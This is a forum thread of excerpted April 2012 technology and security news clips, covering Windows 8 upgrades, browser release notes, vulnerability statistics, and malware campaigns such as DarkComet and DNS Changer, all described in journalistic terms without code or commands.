I get complaints almost every day from people who have been locked out of their Hotmail accounts. Nine times out of 10 they've been careless with the password -- re-using their Hotmail password on other sites, for example, or typing it on a machine of dubious pedigree. Some scammer grabs the password, logs on to Hotmail, and commandeers the account. Within minutes, every address in the Hotmail contact list receives a message that says, "Help I've been mugged, send $500 via Western Union." Invariably the scammers change the password, so they can use the account while the owner's wondering why he or she can't get in.

I'm sure you can see the problem. Hotmail accounts are quite attractive to scammers. If you use a Hotmail ID for your Microsoft Account and your Hotmail account gets hijacked and the password changed, all of a sudden you can't log on to your own PC.

The solution is to create a Password Reset "disk" (which isn't a disk at all but a simple text file) while you still have control of your PC. The Password Reset disk won't get you back into your Hotmail account, but at least it'll pry open the gates to your PC.

http://www.infoworld.com/t/microsoft-windows/the-h...

--
mogs CClip 56
Expert Contributor 18th Apr, 2012 21:39

Microsoft remains mum on Windows 8 upgrades from Vista, XP
Limits upgrade path confirmation to 2009's Windows 7

By Gregg Keizer
April 18, 2012 02:35 PM ET
Computerworld - Microsoft today declined to confirm whether users of Windows XP and Vista will be able to upgrade their PCs to Windows 8 when the latter launches later this year.

On Monday, Microsoft spelled out the editions it would offer customers working with 32- and 64-bit Intel and AMD processor-powered PCs and tablets.

In that blog post, the company also noted the upgrade paths to Windows 8 for existing machines, saying that people now running Windows 7 Starter, Home Basic or Home Premium could upgrade to the consumer-oriented Windows 8. Systems running Windows 7 Professional or Ultimate will be upgradable to Windows 8 Pro.

Although Microsoft did not specify the upgrade path for customers currently running Windows 7 Enterprise, the assumption is that they will be able to upgrade to Windows 8 Enterprise, which, like its predecessor, will be distributed only to companies with Software Assurance upgrade agreements.

The omission of the problem-plagued Vista and the nearly 11-year-old XP from Microsoft's explicit upgrade path seemed odd: In February, the company used an FAQ to plainly state that users of those OSes could upgrade to Windows 8's beta, tagged "Consumer Preview."

Read more at :-
http://www.computerworld.com/s/article/9226333/Mic...

--
mogs CClip 57
Expert Contributor 19th Apr, 2012 22:03
HP Report: More Attacks, Despite Fewer New Vulnerabilities Overall

Attackers are taking advantage of high-severity and unpatched vulnerabilities, according to HP's Top Cyber Security Risks Report.

By Sean Michael Kerner | April 19, 2012

For years, security vendors have been in an arms race with hackers. As the rate of discovery of new vulnerabilities continued to grow, attackers have enjoyed an ever-expanding menu of security flaws to exploit. But last year, something happened: The number of new vulnerability reports actually declined.

According to HP's new Top Cyber Security Risks Report for 2011, there was a 19.5 percent decrease in the number of new publicly reported vulnerabilities over the course of last year.

But don't start celebrating just yet, because attack volume still continues to increase. Attack data from HP TippingPoint shows approximately 475 million attacks in 2010 vs. 531 million in 2011 -- an 11 percent increase.

So while the number of publicly reported vulnerabilities is down, the overall security risks have not actually declined. That's according to Jennifer Lake, security product marketing manager at HP DVLabs, who told eSecurity Planet that a deeper analysis of the new vulnerabilities that were disclosed in 2011 shows that the proportion of high-severity vulnerabilities has actually increased. In 2011, high-severity vulnerabilities (those with a CVSS score of between 8 and 10) jumped by 24 percent. CVSS (Common Vulnerability Scoring System) vulnerabilities with an 8 to 10 score are items that are exploitable remotely and represent high immediate risk.

HP also found that many attackers are also still going after old (unpatched) vulnerabilities. Many attackers are now using exploit toolkits such as Blackhole which are packaged to include known vulnerabilities. That's another reason why there isn't as much of a need for attackers to find new vulnerabilities, because the old ones are still effective against so many systems.

Read more at :-
http://www.esecurityplanet.com/network-security/hp...

--
mogs CClip 58
Expert Contributor 19th Apr, 2012 22:10
Last edited on 19th Apr, 2012 22:12
Chrome Updates
Beta Channel Update

Wednesday, April 18, 2012 | 16:50
Labels: Beta updates
The Beta channel has been updated to 19.0.1084.30 for Windows, Mac, Linux, and Chrome Frame.

Take a look at the changelog to see what happened in this release, we've updated the localization and fixed a number of stability issues.

If you'd like to get on the Beta channel, you can download it from our Beta download page. If you find a new issue, please let us know by filing a bug.

Anthony Laforge
Google Chrome

Dev Channel Update
Tuesday, April 17, 2012 | 17:30
Labels: Dev updates
UPDATE: Windows and Chrome Frame has been updated to 20.0.1105.2. It contains a fix for stability crash.


The Dev channel has been updated to 20.0.1105.0 for Windows, Mac, Linux and Chrome Frame. This build contains following updates:

All
Updated V8 - 3.10.2.1
Fixed issues - 121584, 122130, 122850, 123403
Fixed empty apps page crash. (Issue: 122214)

Windows
Fixed a crash in the Cloud Print connector when connecting via Remote Desktop (Issue: 122996)
Fixed incorrect program icon being shown in the task switcher. (Issue: 118368)
Fixed downloads page drag/drop. (Issue: 122946)

Known Issues
[Mac 10.6] Video isn’t displayed when entered into presentation mode (pressing cmd + shift + f) (Issue: 123911)

Full details about what changes are in this build are available in the SVN revision log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug.

Dharani Govindan
Google Chrome

--
mogs CClip 59
Expert Contributor 19th Apr, 2012 22:17

Security firm Trend Micro says Apple topped its list of companies hit with vulnerabilities followed by Oracle and Google

By John P. Mello Jr.
Apple led all major technology vendors in reported vulnerabilities in its operating system and software during the first three months of 2012, according to a report released Tuesday by Trend Micro.

Apple reported 91 vulnerabilities during the period, making it number one among the top 10 technology vendors in the industry, said the report, "Security in the age of Mobility." [PDF]

Trailing Apple were Oracle (78 vulnerabilities), Google (73), Microsoft (43), IBM (42), Cisco (36), Mozilla (30), MySQL (28), Adobe (27), and Apache (24).

In addition, Trend Micro reported that Apple issued a record number of patches to its Safari browser in March during the period. A year earlier, March was also a mammoth month for patches, with Apple addressing 93 vulnerabilities, a third of them characterized as "critical," in its Leopard and Snow Leopard operating system.

More at :-
http://www.infoworld.com/d/security/report-apple-o...

--
mogs CClip 60
Expert Contributor 19th Apr, 2012 22:24
Two-thirds of UK web cookies owned by third parties
Most websites in the UK are tracking your every move

By Sophie Curtis | Techworld | 19 April 12
UK websites contain an average of 14 cookies per page, the majority of which belong to third parties, according to a new report.

Cookies are small sections of code that websites put on a user's computer so that they can remember something. They are used to enable websites to remember users' preferences, but can also be used to track consumers' browsing behaviour for targeted advertising purposes.

A typical user will encounter anywhere between 112 and 140 cookies during their average session on a British website, according to privacy solutions provider TRUSTe, and over two-thirds will be used by third parties (ie. not the website owner) to deliver targeted advertising.

The news comes just over a month before the EU e-Privacy Directive is enforced in the UK, requiring anyone running a website to get explicit opt-in consent from their visitors before deploying cookies on their machines. The law is designed to give people greater choice about whether or not they want their online behaviour to be tracked.

More at :-
http://www.pcadvisor.co.uk/news/security/3352412/t...

--
mogs CClip 61
Expert Contributor 20th Apr, 2012 22:03
Last edited on 20th Apr, 2012 22:04
April 20, 2012

Symantec: 'VeriSign Trusted' mark out, 'Norton Secured' in

New Symantec trust-mark branding means website has to have passed daily security scans

By Ellen Messmer | Network World

Symantec is phasing in a new trust mark to ensure Web users that the sites they are visiting are safe. Symantec has been replacing "VeriSign Trusted" with "Norton Secured, powered by VeriSign."

The old "VeriSign Trusted" mark (right) meant the website uses a VeriSign SSL certificate for authentication and also got a daily malware scan, which VeriSign added as a service associated with the mark in 2010 to boost its security significance. In August of that year, Symantec acquired this VeriSign identity and authentication business for more than $1 billion, and has been sorting out brand issues ever since. One result is the newly created "Norton Secured, powered by VeriSign" trust mark -- Norton, of course, is Symantec's consumer-oriented security brand.

More at :-
http://www.infoworld.com/d/security/symantec-veris...


--
mogs CClip 62
Expert Contributor 20th Apr, 2012 22:13
Last edited on 20th Apr, 2012 22:14

100 million users might be affected by a social network vulnerability

Problems reported to Ning network
By Dave Neal
Fri Apr 20 2012, 17:34
DO IT YOURSELF social networking company Ning is reportedly suffering from a slight security problem that could affect 100 million users.

Ning lets people set up their own gasbag social networking channels and is used by people like the pop group Radiohead. According to a Dutch report a problem with its security could leave them wide open to account hijackers.

A Dutch web site called Web Wereld says that two students, Angelo Geels and Alex Brouwer have exploited cookies to gain login control over Ning user accounts. They used a proof of concept that showed they could access 90,000 accounts and 100 million users, but had no intention of exploiting it for malicious purposes.

They did suggest that if others were able to use it then they could take over Ning accounts. "You can build an application that automates acquisition of an identity," said Geels in the report.

The students told Ning about the exploit last month and since then the firm has worked to fix it. This is not the first time that security students have worked with Ning, and last year students reported five vulnerabilities that included the threat of credit card theft.

http://www.theinquirer.net/inquirer/news/2169403/1...

--
mogs CClip 63
Expert Contributor 20th Apr, 2012 22:22
Fake Steam Client Urges Users to Disable Antivirus

Advertised on YouTube as a Steam Cracker that allows users to play “all games for free,” the malicious element is actually part of a phishing scheme that targets game serial numbers.

Chris Boyd of GFI reveals that the YouTube page which promotes the shady app urges users to disable their antivirus applications and their firewalls because they falsely detect the program as being a threat.

Of course, this is a real threat, which apparently runs only on Windows Vista or newer versions of the operating system.

The fake Steam client’s installation process is legitimate-looking and real steampowered pages are included, to make everything appear more credible. There are even buttons that point to the genuine Playstation Network ID login page.

While on the surface everything seems legit, in the background, the phony application accesses the registries in an attempt to steal CD Keys.

More at :-
http://news.softpedia.com/news/Fake-Steam-Client-U...

--
mogs CClip 64
Expert Contributor 20th Apr, 2012 22:29

April 20th, 2012, 12:05 GMT · By Eduard Kovacs

Spy Trojan Served by Syrian Hackers as “Skype Encription”

We’ve seen numerous reports from security solutions firms regarding the campaigns that target Syrians. Trend Micro experts provide another example of a malicious plot, this time leveraging a so-called Skype Encription application.

Advertised as a product made by IT Security Lab to encrypt communications, in reality, Skype Encription hides the DarkComet RAT that’s been used in other similar schemes.

After analyzing the shady application, experts found that it may have been developed by SyRiAnHaCkErS.

So how does the plot work?

First, users are presented with the site from which Skype Encription can be downloaded. Once it finds itself on a computer, Skype Encription v 2.1.exe, identified as BKDR_METEO.HVN, connects to a server from which it downloads skype.exe, which is actually a backdoor called BKDR_ZAPCHAST.HVN.

This backdoor is the Remote Access Trojan known as DarkComet, which can allow the masterminds of the operation to take full control of the infected system.

Two important things must be mentioned. The shady Skype Encription program is not only a piece of malware, but it doesn’t offer any of the features it promises. Experts found that it does not encrypt communication in any way.

Furthermore, Skype uses AES encryption on audio, video and text communications, which means that users shouldn’t worry about encrypting messages with third party apps.

It’s clear that Syrians continue to be targeted and these threats will become more vicious. That is why Syrians, or anyone interested in particular pieces of software, should be wary before rushing to install programs.

Many applications, especially those that purport to come from the websites of important security solutions providers, are often found to hide malicious elements. That is why the best thing users can do is download software only from the vendor itself or from trusted websites.

http://news.softpedia.com/news/Spy-Trojan-Served-b...

--
mogs CClip 65
Expert Contributor 20th Apr, 2012 22:33
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft Releases Antimalware Engine 1.1.8304.0
Just as announced several days back, Microsoft’s Antimalware Engine 1.1.8304.0 has been made available on April 18th, 2012.

Fresh out of the Redmond-based software giant’s laboratories, the new release was pushed to all of the company’s Microsoft Security Essentials customers.

Additionally, the new Antimalware Engine 1.1.8304.0 was delivered to all Forefront Client Security, Forefront Endpoint Protection, and Windows Intune Endpoint Protection customers.

“Signature package 1.125.0.0 is the first that contains this engine,” the software company also said on the new release.

The new engine iteration was made available as part of Microsoft’s traditional monthly updates for the technology and follows the Antimalware Engine 1.1.8202.0 that came out on March 20th.

The software was designed to enable increased reliability and security of various products and was meant to address the latest threats discovered out there.

http://news.softpedia.com/news/Microsoft-Releases-...

--
mogs CClip 66
Expert Contributor 21st Apr, 2012 17:14
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Top 5 WordPress Vulnerabilities and How to Fix Them

WordPress is a popular target for hackers, but there are steps you can take to make your installation more secure.

By Aaron Weiss | April 20,

Did you know that more than 73 million web sites in the world run on the WordPress publishing platform? This makes WordPress more popular than Microsoft SharePoint, Blogger, or Drupal. It also means that WordPress is a large target for hackers.

Half of the WordPress sites out there are self-hosted, which means that the WordPress administrator carries the lion's share of responsibility for a secure installation. Out of the box, there are several ways that WordPress security can be tightened down, but only a fraction of sites actually do so. This makes WordPress an even more popular target for hackers.

The following five strategies can help any WordPress installation become significantly more secure, and raise awareness of the types of vulnerabilities to defend against.

Read more at :-
http://www.esecurityplanet.com/open-source-securit...

--
mogs CClip 67
Expert Contributor 22nd Apr, 2012 21:16
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Experts Find Control Panel for Ransomlock Powered Ransomware

Ransomware infections have become more popular among cybercriminals, and security researchers have come across another Trojan that fuels such campaigns. The novelty in this scenario is that the control panel that’s being utilized in the scheme has been found.

Identified by Symantec as Trojan.Ransomlock.K, the malicious element communicates with a command and control server from which it receives its orders.

The interface that allows the cybercrooks to communicate with their Trojan is called Silent Locker Control Panel and according to the experts, it is somewhat similar to other control panels used for pieces of malware such as ZeuS and SpyEye.

The Russian variant of the Silent Locker Control Panel found by experts offers a number of options. First of all, it tracks the infected computer’s location and date, information that can be used for billing.

Also based on the location, the cybercriminal can choose what picture the ransomware displays when it takes over a computer. For instance, if the victim resides in the UK, a picture of the Metropolitan Police can be used, the default image being the one shown in the screenshot.

If notifications that rely on the reputation of a law enforcement agency don’t work, the fraudsters can always turn to fake Windows Security Checks or other scams that may convince the victim that his/her device is being blocked for performing illegal activities, or even because of some phony system errors.

While in this case experts haven’t found a Trojan builder for Ransomlock.K, they believe that the kit most likely comes with one. Similar to SpyEye and ZeuS, most crimeware kits offer the complete package: Trojan, builder and control panel.

The bottom line is that no matter if you find your computer being held hostage by a law enforcement agency, or by a fake security solutions provider that urges you to purchase cleaning products, never ever pay the amount of money they demand.

http://news.softpedia.com/news/Experts-Find-Contro...


--
mogs CClip 68
Expert Contributor 22nd Apr, 2012 21:23
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Secfence: NASA Closed Security Holes, but XSS Flaws Still Present

Experts from Secfence Technologies reveal that NASA has been working on patching some of the vulnerabilities present on its websites, but there are still a few on which the ever-present cross-site scripting (XSS) flaw can still be found.

Since its last report, when it admitted that there’s a lot of work to be done in the security sector, NASA has been working on securing its numerous public facing websites, but there’s still a lot to be done.

Security researchers from Secfence provided a couple of examples.

First, the PDS domain, the one that hosts The Planetary Data System, has been named as containing an XSS weakness that could be easily leveraged by ill-intended hackers.

“Once identified, malicious users can use this to perform various JavaScript- based attacks,” Prashant Uniyal, information security analyst at Secfence told us.

Many may be wondering why the screenshot provided by the experts actually displays the eBay site. That’s because the XSS vulnerability can allow cybercriminals to change the site’s appearance in any way they desire.

By convincing their potential victims to click on a cleverly designed link, the cybercrooks can replace the regular content with anything from malware serving sites to webpages that host phishing forms.

Imagine if instead of the eBay site, there would be a page that displays a form which requests the user to enter his/her passwords and other sensitive information.

Because of the URL displayed in the browser’s address bar, the victim believes that he/she is actually on the legitimate NASA site.

The second domain appointed as being vulnerable is the one of the Goddard Space Flight Center. In this scenario, the white portion of the webpage seen in the screenshot could also be altered to display arbitrary content. For the plot to be successful, some social engineering is required, but as we’ve seen on previous occasions, this is not a great impediment.

By making these flaws public, the experts hope to raise awareness and get NASA to rush the patching process.

http://news.softpedia.com/news/Secfence-NASA-Close...

--
mogs CClip 69
Expert Contributor 22nd Apr, 2012 21:27
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Latest Opera 12 Snapshot Switches to DirectX, Beta Is Around the Corner

Opera 12 is closer than ever, the first beta is just around the corner, Opera announced. It's not quite there yet so, for now, there's another snapshot for testing.

It's an important one though, the latest snapshot enables DirectX support on Windows, but it also comes with hardware acceleration disabled by default, a change that will persist with the final, stable release.

DirectX-backed hardware acceleration is not on par with the OpenGL-based alternative, Opera warns, but it is good enough for testing. Eventually, DirectX will be the preferred API on Windows since it's better supported than OpenGL.

Apart from these big changes, the latest snapshot comes with a long list of bug fixes and improvements, related to web camera support, out-of-process-plugins and many more. The full changelog is available in Opera's announcement.

http://news.softpedia.com/news/Latest-Opera-12-Sna...

--
mogs CClip 70
Expert Contributor 22nd Apr, 2012 21:32
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Mac OS X Is Vulnerable To Malware, Says Kaspersky

Written by Radu Tyrsina

Myth buster!

The time when Mac users could show off their well-shielded machines and make fun of regular PC users, who faced one virus attack after another, is long gone.

After Apple announced back in 2011 that their beloved Macs reached 5 per cent of the desktop and laptop global market share, cyber criminals the world over turned this remark into a challenge.

Just a year ago, Mac OS X suffered aggressive malware attacks from FakeAv/Rogueware, resulting in Macs being exposed to certain weakness issues - with the platform displaying exploitable security loopholes.

"Safari, Quicktime, and other software on Apple devices is regularly exploited during pwnage contests, but widespread cybercrime attention hadn't caught on until this past year," points out Kurt Baumgartner, Kaspersky Lab expert.

The recent Flashback malware, or Flashfake (as presented by numerous variants as fake Flash updates requiring installation) has revealed this Mac OS X vulnerability.

There are specialised groups that target Macs and hijack traffic in order to earn ad revenue, such as Koobface - distributing malware capable of performing sophisticated banking crimes.

Read more: http://www.itproportal.com/2012/04/21/mac-os-x-is-...

--
mogs CClip 71
Expert Contributor 23rd Apr, 2012 20:28
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Firefox skirts Windows security feature to make silent updates happen
Firefox 12, set to release Tuesday, sidesteps Windows' UAC

By Gregg Keizer
April 23, 2012 12:56 PM ET
Computerworld - Mozilla will ship Firefox 12 tomorrow with a key component of its years-long silent update project.

Firefox 12, which got the green light from Mozilla last week, is slated to release on Tuesday, April 24.

Among the changes to Firefox 12, the most noticeable to Windows users will be the disappearance of the UAC, or "user account control," prompt on Vista and Windows 7 during updates.

UAC is a security feature introduced in Vista -- and in a less-intrusive form, tucked into Windows 7, too -- that requires users to agree to most program installations.

Firefox 12 will be the first edition from the open-source developer that sidesteps UAC

Read more at :-
http://www.computerworld.com/s/article/9226463/Fir...

--
mogs CClip 72
Expert Contributor 23rd Apr, 2012 20:38
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Researchers Develop Personal Firewall Solution for Pacemakers, Insulin Pumps

The MedMon device is intended to protect wireless medical devices from cyber attacks.

By Jeff Goldman

Purdue University and Princeton University researchers have developed a device, called MedMon, which is designed to protect wireless medical devices such as pacemakers and insulin pumps from hacking.

"The potential problem drew wide attention twice last year -- first when diabetic Jerome Radcliffe tweaked the dosage levels on his own pump at the Defcon hacking conference, prompting a call to action from federal lawmakers, then again when professional hacker Barnaby Jack of ATM-hacking fame showed how easy it is to deliver a lethal dose of insulin at the Hacker Halted security conference," writes CMIO's David Pearson.

"The prototype MedMon (medical monitor) device acts as a firewall that prevents hackers from interfering with these devices," writes mobihealthnews' Brian Dolan. "The team has demonstrated the system protecting a diabetes system that consists of a wireless-enabled glucose meter and insulin pump that communicate with each other via short range wireless."

"It's an additional device that you could wear, so you wouldn't need to change any of the existing implantable devices," Purdue professor of electrical and computer engineering Anand Raghunathan said in a statement. "This could be worn as a necklace, or it could be integrated into your cell phone, for example."

"It works, the researchers explain, through 'multi-layered anomaly detection,' where the software sets off an alarm if it detects a potential hacking effort or simply uses electronic jamming to block the hacking program from reaching the device," writes FierceMedicalDevices' Mark Hollmer.

The device is just a proof of concept at this point, and would need to be miniaturized in order to be practical. Still, the researchers have already filed a provisional patent application on the concept.

http://www.esecurityplanet.com/network-security/re...

--
mogs CClip 73
Expert Contributor 23rd Apr, 2012 20:47
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
FBI Steps Up 'Internet Doomsday' Awareness Malware Campaign
FBI says infected users must deal with DNS changer malware or risk losing Internet in July.

By Jared Newman | PC World | 23 April 12
PC users infected with a strain of malware called DNS Changer will face their own personal Internet doomsday in July unless they disinfect their computers, the FBI warns.

Users have until July 9 to rid themselves of the DNS Changer malware, which can infect Windows PCs and Macs alike. After that, the FBI will throw a switch that prevents infected computers from accessing the Internet.

It's not as Big Brother as it sounds. DNS Changer is a Trojan that surfaced in 2007 and infected millions of machines. The malware would redirect computers to hacker-created Websites, where cyber-criminals sold at least $14 million in advertisements. DNS Changer also prevented computers from updating or using anti-virus software, leaving them vulnerable to even more malicious software.

Last November, in one of the biggest cybersecurity takedowns ever, the FBI arrested six Estonian nationals that allegedly ran the clickjacking fraud, and seized the rogue DNS servers where infected users were being redirected. The FBI has put up surrogate servers in place of the malicious ones, but only temporarily.

Read more: http://www.pcadvisor.co.uk/news/security/3353186/f...

--
mogs CClip 74
Expert Contributor 23rd Apr, 2012 20:54
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Plumbers of the interwebs vow to kill IP hijacking

Task force to send 'Rover' out to wild web galaxy
By John Leyden

Posted in Hosting, 23rd April 2012 08:31 GMT
The Internet Engineering Task Force (IETF) aims to strengthen the basic protocols of the internet, with a way to stop route, or IP, hijacking. IETF experts say the proposed fix is simpler to implement than previous suggestions.

IP hijacking exploits a fundamental weakness of the internet. Data and messages sent across the internet are transmitted via routers, and those routers are blindly trusted. No measures are in place to verify if they have been tampered with to re-direct or intercept traffic.

In 2008, Pakistan Telecom took advantage of this blind trust to send YouTube briefly into a global blackhole. CNET's Declan McCullagh wrote at the time:

By accident or design, the company broadcast instructions worldwide claiming to be the legitimate destination for anyone trying to reach YouTube's range of Internet addresses.

The security weakness lies in why those false instructions, which took YouTube offline for two hours on Sunday, were believed by routers around the globe. That's because Hong Kong-based PCCW, which provides the Internet link to Pakistan Telecom, did not stop the misleading broadcast - which is what most large providers in the United States and Europe do.


More at :-
http://www.theregister.co.uk/2012/04/23/ip_hijack_...

--
mogs CClip 75
Expert Contributor 23rd Apr, 2012 20:58
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Security bug stalls new dot-word TLD land grab AGAIN

ICANN's domain explosion backfires, fizzles out
By Kevin Murphy

Posted in Hosting, 23rd April 2012 13:01 GMT
Domain name overlord ICANN has been forced to delay its new top-level domain (TLD) expansion by another week as its techies attempt to analyse the fallout of an embarrassing security vulnerability.

Its TLD Application System (TAS), which companies worldwide have been using since January to confidentially apply for gTLDs such as .gay, .london and .blog, has now been down for 10 days due to a bug that enabled some applicants to see information belonging to others.

While ICANN maintains that it has fixed the problem, it now says that it needs at least another week to sift through its mountains of TAS logs, in order to figure out which applicants' data was visible to which other applicants.

More at :-
http://www.theregister.co.uk/2012/04/23/security_b...

--
mogs CClip 76
Expert Contributor 24th Apr, 2012 08:32
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Google boosts Web bug bounties to $20,000
Increases payments for bugs in core sites, services and Web apps

By Gregg Keizer

Computerworld - Google today dramatically raised the bounties it pays independent researchers for reporting bugs in its core websites, services and online applications.

The search giant boosted the maximum reward from $3,133 to $20,000, and added a $10,000 payment to the program.

The Vulnerability Reward Program (VRP) will now pay $20,000 for vulnerabilities that allow remote code execution against google.com, youtube.com and other core domains, as well as what the company called "highly sensitive services" such as its search site, Google Wallet, Gmail and Google Play.

Remote code flaws found in Google's Web apps will also be rewarded $20,000.

More at :-
http://www.computerworld.com/s/article/9226476/Goo...

--
mogs CClip 77
Expert Contributor 24th Apr, 2012 08:37
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Stable Channel Update
| 11:26
Labels: Stable updates

The Chrome Stable channel has been updated to 18.0.1025.165 on Mac.


This release fixes a top crasher on the Mac. (Issue: 123589).


Interested in hopping on the stable channel? Find out how. If you find a new issue, please let us know by filing a bug.

Karen Grunberg
Google Chrome

--
mogs CClip 78
Expert Contributor 24th Apr, 2012 08:41
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Cyber arms race will be next step in computer warfare, says F-secure's Mikko Hypponen

Any future crisis between technically advanced nations will have cyber elements
By Lee Bell

SECURITY FIRM F-secure's chief security researcher, Mikko Hypponen has warned that we are entering into a cyber warfare revolution, and that governments will soon attempt to outdo each other based on their computer weapons' prowess.
The internet security expert said in an exclusive interview with The INQUIRER that any future crisis between technically advanced nations will involve cyber elements.
His comments came after hearing last week that China and the US have been engaging in "war games" simulations.
"I wasn't expecting [war games] so soon," Hypponen said.
"I'm surprised and I think it is a good move because everybody is worried about escalation. The way to fight unnecessary escalations is that you know more about how the perceived enemy would act if there would be an escalation. War games are exactly that."
It was Hypponen's observations on the war games which led him to remark that we must look at "the bigger picture".

More at :-
http://www.theinquirer.net/inquirer/news/2169722/c...

--
mogs CClip 79
Expert Contributor 24th Apr, 2012 21:21
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Norton Secured Seal: Symantec Combines VeriSign Checkmark with Norton Brand

Users who want to check if websites are trusted and secure shouldn’t look for the VeriSign Trust Seal anymore. Symantec decided to combine it with their Norton brand and thus resulted the Norton Secured Seal.

Ever since the security organization acquired VeriSign Authentication Services, anti-malware and security technologies have been integrated into authentication solutions.

“Since acquiring the VeriSign Authentication business, Symantec extends the core foundation of SSL to offer the most comprehensive security portfolio in the market,” revealed Fran Rosch, vice president, Identity and Authentication, Symantec.

“Our shift to delivering Website Security Solutions further strengthens the protection of data and information in transit. The Norton Secured Seal represents a major step in helping companies establish higher levels of website trust and confidence with their customers.”

An emblem that can guarantee a safe browsing experience is highly important in an age where the Internet is a place that should be treated as dangerous by default.

More at :-
http://news.softpedia.com/news/Norton-Secured-Seal...

--
mogs CClip 80
Expert Contributor 24th Apr, 2012 21:28
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Macs more likely to carry Windows malware than Mac malware, study finds
Seventy-five percent of Mac OS X infections involve a Flashback variant, Sophos finds

By Lucian Constantin | IDG News Service

One in five Mac computers is likely to carry Windows malware, but only one in 36 is likely to be infected with malware specifically designed for the Mac OS X, according to a study performed by antivirus firm Sophos.

Sophos collected malware detection statistics from 100,000 Mac computers that run its free antivirus product and found that 20 percent of them contained one or more types of Windows malware.

When stored on a Mac, Windows malware is inactive and can't do any harm, unless that computer has Windows installed as a secondary OS.

However, such malicious files can still be transferred unknowingly by Mac users to Windows machines via file sharing, USB memory sticks, external hard disk drives and other removable media devices.

More at :-
http://www.infoworld.com/d/security/macs-more-like...

--
mogs CClip 81
Expert Contributor 25th Apr, 2012 21:24
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Risky websites to be named and shamed

According to the 'Pulse' tool, the UK Direct.gov web portal, used by UK citizens for financial transactions such as renewing car tax discs, does not have valid certificates for its domain.

Pulse has been set up by the Trustworthy Internet Movement (TIM), and allows the public to type in web addresses to find out whether the organisation has good SSL security. It also lists badly performing sites, in an effort to encourage the site owners to implement SSL properly, according to TIM-backer and Qualys chief executive Philippe Courtot.

It was frustrating to see how many sites did not have SSL properly implemented.

SSL and its successor TLS are widely used online to authenticate transactions between browsers and websites. Web browsers and servers use TLS to prevent eavesdropping or tampering with a communication. Taher Elgamal, a cryptographer credited with co-inventing TLS, told ZDNet UK on Wednesday that one of the dangers of websites not using SSL correctly is that the websites could be spoofed.

Read more at :-
http://www.zdnet.co.uk/blogs/security-bulletin-100...

--
mogs CClip 82
Expert Contributor 25th Apr, 2012 21:33
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
GlobalSign breach was down to unpatched system
By Tom Espiner , 25 April, 2012 17:20

A hacker managed to get into a GlobalSign server and compromise the company's digital certificate due to a piece of unpatched open source software on the server, according to a C-Level member of GlobalSign staff.

The code had not been updated as it was not included on lists of proprietary software to be patched, the senior GlobalSign staff member told ZDNet UK on Wednesday.

"There was an old version of a component that was unpatched," said the GlobalSign exec. "It was an open-source piece of code that was not included in versioning maintenance."

GlobalSign took the precaution of halting certificate issuance for nine days last September after hacktivist the 'Comodohacker' claimed to have breached the certificate authority's systems. The company tore down and rebuilt its systems after it found its external marketing server had been hacked.

An investigation by security company Fox-IT found that GlobalSign's company certificate had been compromised, potentially allowing an attacker to mimic the company's website. GlobalSign's root certificate, which allows the company to issue certificates that browsers trust to authenticate other websites, had not been compromised.

The machine holding GlobalSign's root certificate is not connected to the internet, the exec told ZDNet UK. To access the root certificate, a person must retrieve the machine from a locked box, insert a number of smart cards, and type in multiple PINs and access codes. The 'Comodohacker' accessed a webserver that was distinct from the company's mailserver, and managed to compromise the company certificate and some PDF files.

http://www.zdnet.co.uk/blogs/security-bulletin-100...


--
mogs CClip 83
Expert Contributor 25th Apr, 2012 21:39
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
CCleaner 3.18 Adds Support for Firefox 12

CCleaner just received an update, incrementing the build number to 3.18. The new revision keeps up with browser development by adding support for the freshly released Firefox 12 as well as Google Chrome 20.

However, modifications available in CCleaner 3.18 do not resume to web browsers. It also integrates multiple selection in the detailed results view and improves support for Internet Explorer 64-bit add-ons.

Moreover, the current revision sports a better folder detection algorithm for cleaning up items as well as improved scrolling interface for include/exclude dialogs. On the same note, compatibility with Windows 7 Alt+Tab function has been revised and bettered.

Adding a new batch of applications it can clean up is also available, with Corel VideoStudio Pro X5, MS Security Client and GIMP 2.8 making the list.

http://news.softpedia.com/news/CCleaner-3-18-Adds-...

--
mogs CClip 84
Expert Contributor 25th Apr, 2012 21:42
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Dev Channel Update
Tuesday, April 24, 2012 | 17:08
Labels: Dev updates
The Dev channel has been updated to 20.0.1115.1 for Windows, Mac, Linux and Chrome Frame. The build contains few fixes and update to V8 (3.10.5.0). Full details about what changes are in this build are available in the SVN revision log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug.

Dharani Govindan
Google Chrome

--
mogs CClip 85
Expert Contributor 25th Apr, 2012 21:54
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Computerworld - Mozilla released Firefox 12, patching 14 security bugs in the browser and moving it one step closer to matching rival Chrome in silent updating.

